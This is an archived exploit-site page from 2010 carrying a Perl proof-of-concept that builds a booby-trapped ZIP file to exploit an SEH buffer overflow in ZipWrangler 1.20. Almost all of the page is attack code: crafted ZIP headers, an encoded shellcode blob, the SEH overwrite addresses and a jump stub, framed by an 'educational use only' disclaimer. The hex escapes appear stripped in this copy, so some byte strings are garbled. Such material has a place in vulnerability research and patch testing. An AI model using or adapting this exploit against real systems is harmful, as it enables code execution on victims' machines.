ZipWrangler 1.20 (.zip) SEH 0day exploit
Posted on 24 April 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ZipWrangler 1.20 (.zip) SEH 0day exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>======================================== ZipWrangler 1.20 (.zip) SEH 0day exploit ======================================== #!/usr/bin/perl # Title: ZipWrangler 1.20 (.zip) SEH 0day exploit # Author: TecR0c & Sud0 # Date: April 24th, 2010 # Corelan Reference: http://www.corelan.be:8800/advisories.php?id=CORELAN-10-031 # Download: http://www.softpedia.com/get/Compression-tools/ZipWrangler.shtml # Platform: Windows XP sp3 En (VMWARE) # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ # # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes. # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. print "|-------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| security@corelan.be | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]---| "; print " [+] ZipWrangler 1.2 (.zip) SEH exploit "; my $ldf_header = "x50x4Bx03x04". # local signature "x14x00". # version minimum needed to extract "x00x00". #general purpose bit flag "x00x00". #compression method "xB7xAC". #file last modification time "xCEx34". # file last modification date "x00x00x00x00". #CRC32 "x00x00x00x00". #Compressed size "x00x00x00x00" . #Uncompressed Size "x48x10" .# filename length E4 0F "x00x00"; #Extra filed length my $cdf_header = "x50x4Bx01x02". #Signature "x14x00".#version made by "x14x00".#version needed to extract "x00x00".#general purpose bit flag "x00x00".#Compression method "xB7xAC".#File last modification time "xCEx34".#File last modification date "x00x00x00x00". #CRC32 "x00x00x00x00".#Compressed Size "x00x00x00x00".#Uncompressed Size# "x48x10". # filename length "x00x00". #Extra Field Length "x00x00". #File comment length "x00x00". #Disk number where File starts "x01x00". #Internal File Attributes "x24x00x00x00". #External File Attributes "x00x00x00x00"; #Relative offset of local file header; my $eofcdf_header = "x50x4Bx05x06". #End of central Directory Signature "x00x00". #Number of this disk "x00x00". #Disk where central directory starts "x01x00". #Number of central directory records on this Disk "x01x00". #Total Number of central directory records "x76x10x00x00". #Size of central directory (bytes) (central directory header size + payload) "x66x10x00x00". # Offset of start of central directory, relative to start archive (lfh + payload) "x00x00"; #Zip file Comment length; # mov edx, ds :[EAX] ---> the address 0x7FFDFD0C = 00000 in DS # so EDX=0000, next instruction TEST EDX,EDX / Jz xxxxxx (will bypass the error due to mov ECX, ds:[edx]) # the jump will take us to a retn (so we are out from handler routine) --> come back to execution # 0x77E9025B [rpcrt4.dll] will overwrite EIP after being back from exception # bingo , after xEBx06 we are in our xcc # shell = message box eax e my $shell="PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8" . "ABuJIn9JKmK9IT4tdl4tqzrmbpzUaIYcTNkpqfPlKD66lNkpvwlLKsvgx" . "lKsNepNkEf4xpO4XPul3qIs1KaKOKQapLK2LgT14lKsuUlNkpTgurX6aZ" . "JLK1ZwhLKCjepUQzKm3p7W9LKp4nkwqzNp1kOvQKpKLLlmTo0BTTJZahO4" . "MuQKwxihqKOKOIoWKQlQ4Ux2UyNNkcjq4uQJKsVNk6lpKnkrzuL5QXkLKV" . "dNkWqM8K9qT5tglE1XC82C8EyYDNi8eMY9RCXlNpN4NhlbryxMLKOKOKOl" . "IqUfdOKQnN8YrPsMW7lddV2KXlKIoyoKOoycueXQxplPlEpkO3XP3VRfNu" . "4qxpupscUcBK8qLutWzOyIvpVyoaEETMYO2pPMkoXY22mOLOwwlWTf2kXa" . "NKOYokOSXPlpapnV83XQsbOT255P1kkoxaLQ4TGniKSBHQtShWPUpax0op" . "iCD55PhpeqhRPbLUaJiNh2lEteYOykQdqKbSbQCv12rKOXP6QO0pPKOSeV" . "h5ZA"; my $shellcode="A" x 2 . $shell . "A" x (4080-2-length($shell)) . "x0CxFDxFDx7F" . "x90" x 4 . "x5bx02xe9x77" . "x90" x 8 . "x83xC0x16xFFxE0"."xcc" x 59; my $filename="wrangler.zip"; my $payload = $shellcode . ".txt"; print "Size : " . length($payload)." "; print "Removing old $filename file "; system("del $filename"); print "Creating new $filename file "; open(FILE, ">$filename"); print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header; close(FILE); # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-24]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
